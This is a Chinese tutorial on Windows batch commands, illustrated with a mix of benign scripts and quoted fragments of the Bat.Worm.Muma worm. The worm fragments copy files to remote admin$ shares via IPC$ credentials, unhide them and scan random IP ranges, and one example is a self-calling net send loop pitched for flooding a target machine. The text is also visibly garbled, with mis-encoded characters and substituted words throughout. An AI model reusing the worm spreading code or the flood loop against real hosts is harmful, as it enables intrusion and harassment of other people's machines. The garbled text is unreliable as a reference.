批處理2

時(shí)間：2019-07-09 11:23:01

關(guān)鍵字：腳本 command

手機(jī)看文章

掃描二維碼
隨時(shí)隨地手機(jī)看文章

[導(dǎo)讀]@echo off netstat -a -n > a.txt type a.txt | find "7626" && echo "Congratulations! You ha

@echo off
netstat -a -n > a.txt
type a.txt | find "7626" && echo "Congratulations! You have infected GLACIER!"
del a.txt
pause & exit
這里利用了netstat命令，檢查所有的網(wǎng)絡(luò)端口狀態(tài)，只需要你清楚常見木馬所使用的端口，就能很easy的判斷出來(lái)是否
被人種了冰河。然這不是確定的，因?yàn)楸幽J(rèn)的端口7626，完全可以被人修改。這里介紹的只是方法和思路。

借批處理自動(dòng)清除系統(tǒng)垃圾，腳本如下：

@echo off
if exist c:windowstemp*.* del c:windowstemp*.*
if exist c:windowsTempor~1*.* del c:windowsTempor~1*.*
if exist c:windowsHistory*.* del c:windowsHistory*.*
if exist c:windowsrecent*.* del c:windowsrecent*.*

將以上腳本內(nèi)容保存到autoexec.bat里，每次開機(jī)時(shí)就把系統(tǒng)垃圾給自動(dòng)刪除了。這里需要注意兩點(diǎn)：一、DOS不支持長(zhǎng)
文件名，所以就出現(xiàn)了Tempor~1這個(gè)東東；二、可根據(jù)自己的實(shí)際情況進(jìn)行改動(dòng)，使其符合自己的要求。

例五，先看一個(gè)實(shí)例。這是一個(gè)很有意思的腳本，一個(gè)小巧實(shí)用的好東東，把批處理“自動(dòng)化”的特點(diǎn)體現(xiàn)的淋漓盡致。
先介紹一下這個(gè)腳本的來(lái)歷：大家都知道匯編程序（MASM）的上機(jī)過(guò)程，先要對(duì)源代碼進(jìn)行匯編、連接，然后再執(zhí)行，而
這中間有很多環(huán)節(jié)需要輸入很多東西，麻煩的很（只有經(jīng)歷過(guò)的朋友才懂得）。如何使這個(gè)過(guò)程變的簡(jiǎn)單呢？在我們搞匯
編課程設(shè)計(jì)時(shí)，我“被逼”寫了這個(gè)腳本，用起來(lái)很爽，呵呵。看看腳本內(nèi)容：

@echo off
::close echo
cls
::clean screen
echo This programme is to make the MASM programme automate
::display info
echo Edit by CODERED
::display info
echo Mailto me : qqkiller***@sina.com
::display info
if "%1"=="" goto usage
::if input without paramater goto usage
if "%1"=="/?" goto usage
::if paramater is "/?" goto usage
if "%1"=="help" goto usage
::if paramater is "help" goto usage
pause
::pause to see usage
masm %1.asm
::assemble the .asm code
if errorlevel 1 pause & edit %1.asm
::if error pause to see error msg and edit the code
link %1.obj & %1
::else link the .obj file and execute the .exe file
:usage
::set usage
echo Usage: This BAT file name [asm file name]
echo Default BAT file name is START.BAT
::display usage

先不要被這一堆的東西給嚇怕了，靜下心來(lái)仔細(xì)的看（回想一下第一章中第一段是怎么寫的！?。?。已經(jīng)給出了每一行命
令的解釋，兩個(gè)冒號(hào)后面的內(nèi)容為前一行內(nèi)容解釋的E文（害怕E文的朋友也不用擔(dān)心，都很easy，一看就懂了，實(shí)在不懂
了不會(huì)查詞典啊，這么懶？），在腳本執(zhí)行時(shí)不顯示，也不起任何作用。倒數(shù)第5行行首有一個(gè)冒號(hào)，可不是筆誤哦！具
體作用后面會(huì)詳細(xì)講到。此腳本中masm和link是匯編程序和連接程序，必須和edit程序以及你要編輯的源代碼（當(dāng)然還有
這個(gè)腳本，廢話?。┮黄鹪诋?dāng)前目錄中。使用這個(gè)批處理腳本，可以最大可能的減少手工輸入，整個(gè)過(guò)程中只需要按幾下
回車鍵，即可實(shí)現(xiàn)從匯編源代碼到可執(zhí)行exe文件的自動(dòng)化轉(zhuǎn)換，并具備智能判斷功能：如果匯編時(shí)源代碼出現(xiàn)錯(cuò)誤（匯
編不成功），則自動(dòng)暫停顯示錯(cuò)誤信息，并在按任意鍵后自動(dòng)進(jìn)入編輯源代碼界面；如果源代碼匯編成功，則進(jìn)行連接，
并在連接后自動(dòng)執(zhí)行生成的exe文件。另外，由于批處理命令的簡(jiǎn)單性和靈活性，這個(gè)腳本還具備良好的可改進(jìn)性，簡(jiǎn)單
進(jìn)行修改就可以符合不同朋友的上機(jī)習(xí)慣。正在學(xué)匯編的朋友，一定別忘了實(shí)習(xí)一下！

在這個(gè)腳本中出現(xiàn)了如下幾個(gè)命令：@、echo、::、pause、:和goto、%以及if。而這一章就將講述這幾個(gè)命令。

1、@

這個(gè)符號(hào)大家都不陌生，email的必備符號(hào)，它怎么會(huì)跑到批處理中呢？呵呵，不是它的錯(cuò)，批處理本來(lái)就離不開它，要
不就不完美了。它的作用是讓執(zhí)行窗口中不顯示它后面這一行的命令本身（多么繞口的一句話?。：呛?，通俗一點(diǎn)說(shuō)，
行首有了它的話，這一行的命令就不顯示了。在例五中，首行的@echo off中，@的作用就是讓腳本在執(zhí)行時(shí)不顯示后面的
echo off部分。這下懂了吧？還是不太懂？沒(méi)關(guān)系，看完echo命令簡(jiǎn)介，自然就懂了。

2、echo

中文為“反饋”、“回顯”的意思。它其實(shí)是一個(gè)開關(guān)命令，就是說(shuō)它只有兩種狀態(tài)：打開和關(guān)閉。于是就有了echo on
和echo off兩個(gè)命令了。直接執(zhí)行echo命令將顯示當(dāng)前echo命令狀態(tài)（off或on）執(zhí)行echo off將關(guān)閉回顯，它后面的所
有命令都不顯示命令本身，只顯示執(zhí)行后的結(jié)果，除非執(zhí)行echo on命令。在例五中，首行的@命令和echo off命令聯(lián)合起
來(lái)，達(dá)到了兩個(gè)目的：不顯示echo off命令本身，不顯示以后各行中的命令本身。的確是有點(diǎn)亂，但你要是練習(xí)一下的話
，3分鐘包會(huì)，不會(huì)的退錢！

echo命令的另一種用法一：可以用它來(lái)顯示信息！如例五中倒數(shù)第二行，Default BAT file name is START.BAT將在腳本
執(zhí)行后的窗口中顯示，而echo命令本身不顯示（為什么？？）。
echo命令的另一種用法二：可以直接編輯文本文件。例六：
echo nbtstat -A 192.168.0.1 > a.bat
echo nbtstat -A 192.168.0.2 >> a.bat
echo nbtstat -A 192.168.0.3 >> a.bat

以上腳本內(nèi)容的編輯方法是，直接是命令行輸入，每行一回車。最后就會(huì)在當(dāng)前目錄下生成一個(gè)a.bat的文件，直接執(zhí)行
就會(huì)得到結(jié)果。

3、::

這個(gè)命令的作用很簡(jiǎn)單，它是注釋命令，在批處理腳本中和rem命令等效。它后面的內(nèi)容在執(zhí)行時(shí)不顯示，也不起任何作
用，因?yàn)樗皇亲⑨?，只是增加了腳本的可讀性，和C語(yǔ)言中的/*…………*/類似。地球人都能看懂，就不多說(shuō)了。

4、pause

中文為“暫?！钡囊馑迹纯茨愕膚orkman上），我一直認(rèn)為它是批處理中最簡(jiǎn)單的一個(gè)命令，單純、實(shí)用。它的作用，
是讓當(dāng)前程序進(jìn)程暫停一下，并顯示一行信息：請(qǐng)按任意鍵繼續(xù). . .。在例五中這個(gè)命令運(yùn)用了兩次，第一次的作用是
讓使用者看清楚程序信息，第二個(gè)是顯示錯(cuò)誤的匯編代碼信息（其實(shí)不是它想顯示，而是masm程序在顯示錯(cuò)誤信息時(shí)被暫
它停了，以便讓你看清楚你的源代碼錯(cuò)在哪里）。

5、:和goto

為什么要把這兩個(gè)命令聯(lián)合起來(lái)介紹？因?yàn)樗鼈兪欠植婚_的，無(wú)論少了哪個(gè)或多了哪個(gè)都會(huì)出錯(cuò)。goto是個(gè)跳轉(zhuǎn)命令，:
是一個(gè)標(biāo)簽。當(dāng)程序運(yùn)行到goto時(shí)，將自動(dòng)跳轉(zhuǎn)到:定義的部分去執(zhí)行了（是不是分不開？）。例五中倒數(shù)第5行行首出現(xiàn)
一個(gè):，則程序在運(yùn)行到goto時(shí)就自動(dòng)跳轉(zhuǎn)到:標(biāo)簽定義的部分執(zhí)行，結(jié)果是顯示腳本usage（usage就是標(biāo)簽名稱）。不難
看出，goto命令就是根據(jù)這個(gè)冒號(hào)和標(biāo)簽名稱來(lái)尋找它該跳轉(zhuǎn)的地方，它們是一一對(duì)應(yīng)的關(guān)系。goto命令也經(jīng)常和if命令
結(jié)合使用。至于這兩個(gè)命令具體用法，參照例五。

goto命令的另一種用法一：提前結(jié)束程序。在程序中間使用goto命令跳轉(zhuǎn)到某一標(biāo)簽，而這一標(biāo)簽的內(nèi)容卻定義為退出。
如：

……
goto end
……
:end

這里:end在腳本最后一行！其實(shí)這個(gè)例子很弱智，后面講了if命令和組合命令你就知道了。

6、%

這個(gè)百分號(hào)嚴(yán)格來(lái)說(shuō)是算不上命令的，它只是批處理中的參數(shù)而已（多個(gè)%一起使用的情況除外，以后還將詳細(xì)介紹），
但千萬(wàn)別以為它只是參數(shù)就小看了它（看看例五中有多少地方用到它？），少了它批處理的功能就減少了51%了?？纯蠢?br />七：

net use \%1ipc$ %3 /u:"%2"
copy 11.BAT \%1admin$system32 /y
copy 13.BAT \%1admin$system32 /y
copy ipc2.BAT \%1admin$system32 /y
copy NWZI.EXE \%1admin$system32 /y
attrib \%1admin$system32?.bat -r -h -s

以上代碼是Bat.Worm.Muma病毒中的一部分，%1代表的IP，2%代表的username，3%代表password。執(zhí)行形式為：腳本文件
名參數(shù)一參數(shù)二 ……。假設(shè)這個(gè)腳本被保存為a.bat，則執(zhí)行形式如下：a IP username password。這里IP、username
、password是三個(gè)參數(shù)，缺一不可（因?yàn)槌绦虿荒苷_運(yùn)行，并不是因?yàn)樯倭藚?shù)語(yǔ)法就不對(duì)）這樣在腳本執(zhí)行過(guò)程中，
腳本就自動(dòng)用用你的三個(gè)參數(shù)依次（記住，是依次！也是一一對(duì)應(yīng)的關(guān)系。）代換1%、2%和3%，這樣就達(dá)到了靈活運(yùn)用的
目的（試想，如果在腳本中直接把IP、username和password都定義死，那么腳本的作用也就被固定了，但如果使用%的話
，不同的參數(shù)可以達(dá)到不同的目的，是不是更靈活？）。

7、if

接上一章，接著講if命令?？偟膩?lái)說(shuō)，if命令是一個(gè)表示判斷的命令，根據(jù)得出的每一個(gè)結(jié)果，它都可以對(duì)應(yīng)一個(gè)相應(yīng)的
好啊作。關(guān)于它的三種用法，在這里分開講。

(1)、輸入判斷。還是用例五里面的那幾句吧：

if "%1"=="" goto usage
if "%1"=="/?" goto usage
if "%1"=="help" goto usage

這里判斷輸入的參數(shù)情況，如果參數(shù)為空（無(wú)參數(shù)），則跳轉(zhuǎn)到usage；如果參數(shù)為/?或help時(shí)（大家一般看一個(gè)命令的
幫助，是不是輸入的/?或help呢，這里這么做只是為了讓這個(gè)腳本看起來(lái)更像一個(gè)真正的程序），也跳轉(zhuǎn)到usage。這里
還可以用否定形式來(lái)表示“不等于”，例如：if not "%1"=="" goto usage，則表示如果輸入?yún)?shù)不為空就跳轉(zhuǎn)到usage
（實(shí)際中這樣做就沒(méi)意義了，這里介紹用法，管不了那么多了，呵呵。）是不是很簡(jiǎn)單？其實(shí)翻譯成中文體會(huì)一下就
understand了。

(2)、存在判斷。再看例二里這句：

if exist C:Progra~1TencentAD*.gif del C:Progra~1TencentAD*.gif

如果存在那些gif文件，就刪除這些文件。當(dāng)然還有例四，都是一樣的道理。注意，這里的條件判斷是判斷存在的，當(dāng)然
也可以判斷不存在的，例如下面這句“如果不存在那些gif文件則退出腳本”：if not exist C:Progra~1
TencentAD*.gif exit。只是多一個(gè)not來(lái)表示否定而已。

(3)、結(jié)果判斷。還是拿例五開刀（沒(méi)想到自己寫的腳本，竟然用處這么大，呵呵）：

masm %1.asm
if errorlevel 1 pause & edit %1.asm
link %1.obj

先對(duì)源代碼進(jìn)行匯編，如果失敗則暫停顯示錯(cuò)誤信息，并在按任意鍵后自動(dòng)進(jìn)入編輯界面；否則用link程序連接生成的
obj文件。這里只介紹一下和if命令有關(guān)的地方，&命令后面會(huì)講到。這種用法是先判斷前一個(gè)命令執(zhí)行后的返回碼（也叫
錯(cuò)誤碼，DOS程序在運(yùn)行完后都有返回碼），如果和定義的錯(cuò)誤碼符合（這里定義的錯(cuò)誤碼為1），則執(zhí)行相應(yīng)的好啊作（
這里相應(yīng)的好啊作為pause & edit %1.asm部分）。

另外，和其他兩種用法一樣，這種用法也可以表示否定。用否定的形式仍表達(dá)上面三句的意思，代碼變?yōu)椋?
masm %1.asm
if not errorlevel 1 link %1.obj
pause & edit %1.asm

看到本質(zhì)了吧？其實(shí)只是把結(jié)果判斷后所執(zhí)行的命令互換了一下，“if not errorlevel 1”和“if errorlevel 0”的效
果是等效的，都表示上一句masm命令執(zhí)行成功（因?yàn)樗清e(cuò)誤判斷，而且返回碼為0，0就表示否定，就是說(shuō)這個(gè)錯(cuò)誤不存
在，就是說(shuō)masm執(zhí)行成功）。這里是否加not，錯(cuò)誤碼到底用0還是1，是值得考慮的兩個(gè)問(wèn)題，一旦搭配不成功腳本就肯
定出錯(cuò)，所以一定要體會(huì)的很深刻才行。如何體會(huì)的深刻？練習(xí)！自己寫一個(gè)腳本，然后把有not和沒(méi)有not的情況，返回
碼為0或1的情況分別寫進(jìn)去執(zhí)行（怎么，嫌麻煩?。颗帕薪M合算一下才四中情況你就嫌麻煩了？后面介紹管道命令和組合
命令時(shí)還有更麻煩的呢！怕了？呵呵。），這樣從執(zhí)行的結(jié)果中就能很清楚的看出這兩種情況的區(qū)別。

這種用errorlevel結(jié)果判斷的用法是if命令最難的用法，但也恰恰是最有用的用法，如果你不會(huì)用errorlevel來(lái)判斷返回
碼，則要達(dá)到相同的效果，必須用else來(lái)表示“否則”的好啊作，是比較麻煩的。以上代碼必須變成：

masm %1.asm
if exist %1.obj link %1.obj
else pause & edit %1.asm

關(guān)于if命令的這三種用法就say到這里，理解很簡(jiǎn)單，但應(yīng)用時(shí)就不一定用的那么得心應(yīng)手，主要是熟練程度的問(wèn)題?？?
能有的朋友有點(diǎn)驚訝，我怎么沒(méi)給出類似下面三行的用法介紹，是因?yàn)橄旅嫒惺莍f命令幫助里對(duì)它自身用法的解釋，任
何人只要一個(gè)“if /?”就能看到，我沒(méi)有必要在這里多費(fèi)口舌；更重要的原因，是我覺得這樣介紹的不清楚，看的人不
一定看的懂，所以我采用上面自己對(duì)if命令的理解來(lái)介紹。一定要注意的是，這三種用法的格式各不相同，而且也是不能
改變的，但實(shí)際上可以互換（以為從本質(zhì)上講，這三種用法都是建立在判斷的基礎(chǔ)上的，哲學(xué)教我們學(xué)會(huì)透過(guò)現(xiàn)象看事物
本質(zhì)！）。有興趣的朋友可以自己研究一下。

IF [NOT] ERRORLEVEL number do command
IF [NOT] string1==string2 do command
IF [NOT] EXIST filename do command
8、call

學(xué)過(guò)匯編或C的朋友，肯定都知道call指令表示什么意思了，在這里它的意思其實(shí)也是一樣的。在批處理腳本中，call命
令用來(lái)從一個(gè)批處理腳本中調(diào)用另一個(gè)批處理腳本。看例八（默認(rèn)的三個(gè)腳本文件名分別為start.bat、10.bat和ipc.bat
）：

start.bat：
……
CALL 10.BAT 0
……

10.bat：
……
ECHO %IPA%.%1 >HFIND.TMP
……
CALL ipc.bat IPCFind.txt

ipc.bat：
for /f "tokens=1,2,3 delims= " %%i in (%1) do call HACK.bat %%i %%j %%k

有沒(méi)有看出什么不對(duì)的地方？沒(méi)看出來(lái)?。繘](méi)看出來(lái)就對(duì)了，其實(shí)就沒(méi)有不對(duì)的地方嘛，你怎么看的出來(lái)！從上面兩個(gè)腳
本，你可以得到如下信息：1、腳本調(diào)用可以靈活運(yùn)用，循環(huán)運(yùn)用、重復(fù)運(yùn)用。2、腳本調(diào)用可以使用參數(shù)！關(guān)于第一點(diǎn)就
不多說(shuō)了，聰明的你一看就應(yīng)該會(huì)，這里說(shuō)一下第二點(diǎn)。

在start.bat中，10.bat后面跟了參數(shù)0，在執(zhí)行時(shí)的效果，其實(shí)就是把10.bat里的參數(shù)%1用0代替。在start.bat中，
ipc.bat后面跟了參數(shù)ipcfind.txt（一個(gè)文件，也可以做參數(shù)），執(zhí)行時(shí)的效果，就是用ipc.bat中的每一行的三個(gè)變量
（這里不懂沒(méi)關(guān)系，學(xué)過(guò)for命令后就懂了），對(duì)應(yīng)代換ipc.bat中的%%i、%%j和%%k。這里參數(shù)調(diào)用是非常靈活的，使用
時(shí)需要好好體會(huì)。在初學(xué)期間，可以先學(xué)習(xí)只調(diào)用腳本，至于連腳本的參數(shù)一起使用的情況，在后面的學(xué)習(xí)中自然就會(huì)有
比較深刻的理解，這是因?yàn)楫?dāng)你已經(jīng)可以靈活運(yùn)用批處理腳本后，如何使代碼寫的更精簡(jiǎn)更完美更高效就自然包括到了考
慮的范圍，這時(shí)候你就會(huì)發(fā)現(xiàn)在調(diào)用腳本時(shí)直接加入?yún)?shù)，可以使代碼效率加倍。By the way，上面的這幾個(gè)腳本，都是
Bat.Worm.Muma病毒的一部分，在后面的教程里，大家將有機(jī)會(huì)見到這個(gè)病毒的真面目。
那是不是說(shuō)，在同一個(gè)目錄下至少存在兩個(gè)批處理腳本文件（只有一個(gè)你調(diào)用誰(shuí)？）？呵呵，注意了，這句話錯(cuò)了?。≈?br />有一個(gè)照樣可以調(diào)用----調(diào)用自身！看例九（默認(rèn)腳本文件名a.bat）：

net send %1 This is a call example.
call a.bat

這兩句一結(jié)合，效果自然不怎么樣，因?yàn)橹挥幸慌_(tái)機(jī)器來(lái)發(fā)消息，誰(shuí)怕誰(shuí)?。课医o你來(lái)個(gè)禮尚往來(lái)！可如果有100臺(tái)機(jī)器
同時(shí)執(zhí)行，而且每臺(tái)機(jī)器開10和窗口同時(shí)向一個(gè)目標(biāo)機(jī)器發(fā)消息的話，呵呵。這里call a.bat的作用就是調(diào)用自身，執(zhí)行
完前一句net send命令后再調(diào)用自身，達(dá)到了循環(huán)執(zhí)行的目的。

給出一個(gè)很有意思的腳本，有興趣的朋友可以實(shí)驗(yàn)一下。例十（默認(rèn)腳本文件名為a.bat）：

call a.bat

一定要在DOS窗口下執(zhí)行，否則只會(huì)看到一個(gè)窗口一閃而過(guò)，看不到最后結(jié)果。等執(zhí)行完后，當(dāng)腳本被執(zhí)行了1260次，別
忘了想一下到底是為什么！愛情有時(shí)候跟這個(gè)腳本一樣，一旦陷入死循環(huán)，最后的結(jié)果都是意想不到的。只是愛情，絕對(duì)
不會(huì)等到被毫無(wú)理由的循環(huán)這么多次，也許在第三次時(shí)就出現(xiàn)了love is aborted的提示。

9、find

這是一個(gè)搜索命令，用來(lái)在文件中搜索特定字符串，通常也作為條件判斷的鋪墊程序（我怎么突然想起了這四個(gè)字？）。
這個(gè)命令單獨(dú)使用的情況在批處理中是比較少見的，因?yàn)闆](méi)什么實(shí)際意義。還是借例三來(lái)說(shuō)明：

@echo off
netstat -a -n > a.txt
type a.txt | find "7626" && echo "Congratulations! You have infected GLACIER!"
del a.txt
pause & exit

先用netstat命令檢查是否有冰河默認(rèn)的端口7626在活動(dòng)，并把結(jié)果保存到a.txt中。然后使用type命令列出a.txt中的內(nèi)
容，再在列出的內(nèi)容中搜索字符串“7626” ，發(fā)現(xiàn)有的話則提示中了冰河，否則退出?？?，find命令其實(shí)就這么簡(jiǎn)單，
但有一點(diǎn)必須要注意到：如果不使用type命令列出a.txt中的內(nèi)容，而是直接使用find命令在a.txt中找“7626”（find
a.txt "7626" && echo "Congratulations! You have infected GLACIER!"），就必須得給出這個(gè)a.txt的絕對(duì)路徑（我
試過(guò)了，find并沒(méi)有默認(rèn)路徑就是當(dāng)前路徑的功能，必須手動(dòng)指定。也許是我錯(cuò)了，歡迎指正）。因?yàn)樵趂ind命令的幫助
里有這么一句話：如果沒(méi)有指定路徑，find將搜索鍵入的或者由另一個(gè)命令產(chǎn)生的文字。這里的“另一個(gè)命令”自然就指
的type命令了。

至于find命令的其他幾個(gè)參數(shù)如v、n、i等，有興趣的朋友自己去研究吧，這已經(jīng)屬于DOS學(xué)習(xí)的內(nèi)容了，這里就不做介紹
。關(guān)于find命令和其他命令的一些更精妙的用法（有些簡(jiǎn)直令人叫絕），后續(xù)的教程中將介紹，希望關(guān)注。

10、for、set、shift

為什么把這三個(gè)命令放到一起來(lái)講？原因除了我說(shuō)明外，恐怕誰(shuí)也想不到！很簡(jiǎn)單的一句話：其實(shí)我也不太懂！是的，對(duì)
于這兩個(gè)命令，我是從研究Bat.Worm.Muma病毒開始學(xué)習(xí)的，時(shí)間過(guò)去了不少，但還是沒(méi)完全搞明白，我怕講出來(lái)連自己
都看不懂，我更怕不小心講錯(cuò)了成了罪人。所以我給出一個(gè)腳本去告訴你，如何讓這兩個(gè)命令給自己留一個(gè)初步的印象，
其實(shí)也就是這兩個(gè)命令的入門，而并不是說(shuō)如何領(lǐng)會(huì)這兩個(gè)命令。因?yàn)橐I(lǐng)會(huì)如此精妙的兩個(gè)命令（特別是for）談何容
易！也許你會(huì)表?yè)P(yáng)我說(shuō)我誠(chéng)實(shí)、不懂就不懂；也許你會(huì)罵我，讓我既然不懂就趕緊滾蛋，不要在這里丟人顯眼；也許你還
會(huì)說(shuō)一些別的這樣那樣好聽或不好聽的話，都隨便你了，即使我不同意你說(shuō)的話，我也會(huì)誓死捍衛(wèi)你說(shuō)話的權(quán)利?？蠢?
一：

@echo off
for /? > for.txt
set /? > set.txt
shift /? >shift.txt
exit

執(zhí)行后在當(dāng)前路徑下就生成for.txt、set.txt和shift.txt三個(gè)文件，里面分別記錄了for命令、set命令和shift命令的幫
助信息。地球人都能看懂，我就不多說(shuō)了。我在網(wǎng)上曾經(jīng)找了很長(zhǎng)時(shí)間這三個(gè)命令的教程，但都不理想，基本都是照搬的
幫助信息。我想在自己完全掌握了這兩個(gè)命令后，一定要寫一篇用自己的文字總結(jié)出來(lái)的for、set和shift教程（關(guān)于
shift命令，后面介紹批處理的參數(shù)時(shí)還將涉及到），一定會(huì)的，這是我的心愿之一！需要注意的一點(diǎn)是，這三個(gè)命令的
幫助里，介紹的都比較死板，雖然也舉了一些例子，但這是遠(yuǎn)遠(yuǎn)不夠的。要掌握這兩個(gè)命令，最需要的就是耐心！沒(méi)寫
錯(cuò)，就是耐心。光是認(rèn)真看完它們的幫助文字就已經(jīng)需要足夠的耐心了，要進(jìn)一步練習(xí)領(lǐng)會(huì)這兩個(gè)命令，難道不需要更大
的耐心？實(shí)戰(zhàn)練習(xí)的機(jī)會(huì)我會(huì)留給你的，關(guān)鍵還是那句話，看你有沒(méi)有耐心去研究了?？纯蠢?br />

二：

START.BAT：
CALL MUMA.BAT
SET IPA=192.168
CALL 10.BAT 0
:NEARAGAIN
netstat -n|find ":" >A.TMP
FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET
NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
:START
CALL RANDOM.BAT
IF "%NUM1%"=="255" GOTO NEARAGAIN
IF "%NUM1%"=="192" GOTO NEARAGAIN
IF "%NUM1%"=="127" GOTO NEARAGAIN
IF "%NUM2%"=="255" GOTO NEARAGAIN
IF "%NUM3%"=="255" GOTO NEARAGAIN
IF "%NUM4%"=="255" GOTO NEARAGAIN
SET IPA=%NUM1%.%NUM2%
ECHO START > A.LOG
PING %IPA%.%NUM3%.1>B.TMP
PING %IPA%.%NUM3%.%NUM4%>>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO START
CALL 10.BAT %NUM3%
DEL A.LOG
GOTO START
這是Bat.Worm.Muma病毒的起始腳本，設(shè)置了病毒運(yùn)行的環(huán)境變量。

11、|

這個(gè)命令恐怕大家不是很陌生，經(jīng)常好啊作DOS的朋友都應(yīng)該知道，當(dāng)我們查看一個(gè)命令的幫助時(shí)，如果幫助信息比較長(zhǎng)
，一屏幕顯示不完時(shí)DOS并不給我們時(shí)間讓我們看完一屏幕再翻到另一屏幕，而是直接顯示到幫助信息的最后。如在提示
符下輸入help回車時(shí)，就會(huì)看到當(dāng)前DOS版本所支持的所有非隱含命令，但你只能看到最后的那些命令，前面的早就一閃
而過(guò)了，如何解決這個(gè)問(wèn)題？看例十三：

help | more

回車后會(huì)發(fā)現(xiàn)顯示滿一屏幕后就自動(dòng)暫停，等候繼續(xù)顯示其他信息。當(dāng)按寫回車時(shí)，變成一個(gè)一個(gè)的出現(xiàn)；按下空格鍵時(shí)
一屏幕一屏幕顯示，直到全部顯示完為止；按其他鍵自動(dòng)停止返回DOS。

為什么會(huì)出現(xiàn)上述現(xiàn)象？答案很簡(jiǎn)單，這里結(jié)合了管道命令|和DOS命令more來(lái)共同達(dá)到目的的。這里先簡(jiǎn)單介紹一下help
命令和more命令，對(duì)理解|命令的用法有很大幫助。

11.1、help命令。其實(shí)這個(gè)命令是不需要多說(shuō)的，但在上述例子中help命令的用法比較特殊，直接在DOS提示符下輸入
help命令，結(jié)果是讓DOS顯示其所支持的所有非隱含命令，而在其他地方用help命令，如輸入net help回車，則是顯示net
命令的幫助信息。

11.2、more命令?？赡芎芏嗯笥岩郧熬蜎](méi)有接觸過(guò)這個(gè)命令，這個(gè)命令在Linux下的用處非常廣泛，也是管道命令之一。
大家可以找一篇比較長(zhǎng)的文章（a.txt）在DOS提示符下輸入如下兩個(gè)命令去比較一下差別：more a.txt和type a.txt。利
用more命令，可以達(dá)到逐屏或逐行顯示輸出的效果，而type命令只能一次把輸出顯示完，最后的結(jié)果就是只能看到末尾的
部分。在例十三里，more命令的作用就是讓輸出的信息逐屏或逐行顯示。
看到這里，你是否已經(jīng)能隱約感受到了|命令的作用了？沒(méi)錯(cuò)，它的作用，就是把前一命令的輸出當(dāng)后一命令的輸入來(lái)用
的。在例十三里，前一命令的輸出，就是help命令執(zhí)行后顯示的DOS所支持的所有非隱含命令，而這個(gè)結(jié)果剛好做了后一
命令more的輸入。所以例十三和下面的例十四是等效的：

help > a.txt
more a.txt
del a.txt

這里利用另一管道命令>生成了一個(gè)a.txt文件作為中間環(huán)節(jié)，在用more命令查看a.txt文件后再刪除a.txt文件（例十三的
所有好啊作是在內(nèi)存中進(jìn)行的，不生成文件）?？梢钥闯觯_使用管道命令|可以帶來(lái)事半功倍的效果。

結(jié)合例十三和例十四，以及前面的例九再體會(huì)一遍：|命令的作用，就是讓前一命令的輸出當(dāng)做后一命令的輸入。

12、>、>>

這兩個(gè)命令的效果從本質(zhì)上來(lái)說(shuō)都是一樣的，他們都是輸出重定向命令，說(shuō)的通俗一點(diǎn)，就是把前面命令的輸出寫入到一
個(gè)文件中。這兩個(gè)命令的唯一區(qū)別是，>會(huì)清除掉原有文件中的內(nèi)容后把新的內(nèi)容寫入原文件，而>>只會(huì)另起一行追加新
的內(nèi)容到原文件中，而不會(huì)改動(dòng)其中的原有內(nèi)容。例十五：

echo @echo off > a.bat
echo echo This is a pipeline command example. >> a.bat
echo echo It is very easy? >> a.bat
echo echo Believe your self! >> a.bat
echo pause >> a.bat
echo exit >> a.bat

依次在DOS提示符下輸入以上各行命令，一行一個(gè)回車，將在當(dāng)前目錄下生成一個(gè)a.bat文件，里面的內(nèi)容如下：

@echo off
echo This is a pipeline command example.
echo It is very easy?
echo Believe your self!
pause
exit

看到這里，你得到了多少信息？1、可以直接在DOS提示符下利用echo命令的寫入功能編輯一個(gè)文本，而不需要專門的文本
編輯工具；2、管道命令>和>>的區(qū)別如上所述。如果這里只用>命令來(lái)完成上面好啊作，最后也會(huì)生成一個(gè)a.bat，但里面
的內(nèi)容就只剩下最后一行exit了。所以>和>>一般都聯(lián)合起來(lái)用，除非你重定向的輸出只有一行，那么就可以只用>了。結(jié)
合例一再仔細(xì)體會(huì)輸出重定向管道命令>和>>的用法。

13、

14、&

這可以說(shuō)是最簡(jiǎn)單的一個(gè)組合命令了，它的作用是用來(lái)連接n個(gè)DOS命令，并把這些命令按順序執(zhí)行，而不管是否有命令執(zhí)
行失敗。例十六：

copy a.txt b.txt /y & del a.txt

其實(shí)這句和move a.txt b.txt的效果是一樣的，只不過(guò)前者是分了兩步來(lái)進(jìn)行的（在后面還將涉及到具體使用哪種方法的
問(wèn)題）。這個(gè)命令很簡(jiǎn)單，就不多費(fèi)口舌了，唯一需要注意的一點(diǎn)是，這里&兩邊的命令是有執(zhí)行順序的，從前往后執(zhí)行

15、&&

切記，這里介紹的幾個(gè)命令都是組合命令，所以他們前后都必須都有其他命令（要不如何組合？）。這個(gè)命令也不例外，
它可以把它前后兩個(gè)命令組合起來(lái)當(dāng)一個(gè)命令來(lái)用，與&命令不同之處在于，它在從前往后依次執(zhí)行被它連接的幾個(gè)命令
時(shí)會(huì)自動(dòng)判斷是否有某個(gè)命令執(zhí)行出錯(cuò)，一旦發(fā)現(xiàn)出錯(cuò)后將不繼續(xù)執(zhí)行后面剩下的命令。這就為我們自動(dòng)化完成一些任務(wù)
提供了方便。例十七：

dir 文件://1%/www/user.mdb && copy 文件://1%/www/user.mdb e:backupwww

如果遠(yuǎn)程主機(jī)存在user.mdb，則copy到本地e:backupwww，如果不存在當(dāng)然就不執(zhí)行copy了。這句對(duì)搞網(wǎng)管的朋友是否
有點(diǎn)用呢？呵呵。其實(shí)它和下面這句的作用是一樣的：

if exist 文件://1%/www/user.mdb copy 文件://1%/www/user.mdb e:backupwww

至于你喜歡用哪個(gè)就隨便了，我沒(méi)辦法判斷dir和if兩個(gè)命令哪一個(gè)執(zhí)行效率更高，所以不知道用哪個(gè)更好，呵呵。

你是否還記得“有些命令是不能同時(shí)執(zhí)行的”？你是否相信這句話？當(dāng)然得相信，不信就給你出道題：把C盤和D盤的文件
和文件夾列出到a.txt文件中。你將如何來(lái)搞定這道題？有朋友說(shuō)，這還不是很easy的問(wèn)題嗎？同時(shí)執(zhí)行兩個(gè)dir，然后把
得到的結(jié)果>到a.txt里就ok了嘛，看例十八：

dir c: && dir d: > a.txt

仔細(xì)研究一下這句執(zhí)行后的結(jié)果，看看是否能達(dá)到題目的要求！錯(cuò)了！這樣執(zhí)行后a.txt里只有D盤的信息！為什么？就因
